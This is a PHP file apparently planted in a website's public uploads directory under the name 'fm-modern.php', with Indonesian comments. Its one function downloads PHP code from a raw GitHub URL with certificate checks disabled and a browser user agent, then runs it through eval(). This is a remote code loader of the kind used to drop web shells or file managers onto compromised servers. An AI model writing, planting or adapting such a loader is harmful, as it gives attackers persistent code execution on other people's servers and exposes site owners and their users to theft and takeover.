File: /home/ksonpoau/public_html/uploads/fm-modern.php
<?php
function getRemotePHP($url) {
$ch = curl_init(trim($url)); // trim() untuk hapus spasi berlebih di URL
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
CURLOPT_SSL_VERIFYPEER => false, // ⚠️ Hanya untuk development!
CURLOPT_TIMEOUT => 30,
CURLOPT_CONNECTTIMEOUT => 10,
]);
$code = curl_exec($ch);
$error = curl_error($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($httpCode !== 200 || !$code) {
die("❌ Gagal ambil file dari URL Cok :(. HTTP Code: $httpCode | Error: $error");
}
// Eksekusi kode PHP yang diambil
eval("?>$code");
}
// Panggil fungsi dengan URL target
getRemotePHP('https://raw.githubusercontent.com/hadiArsa123/bhgubbjh/refs/heads/main/Modern-2026.php');
?>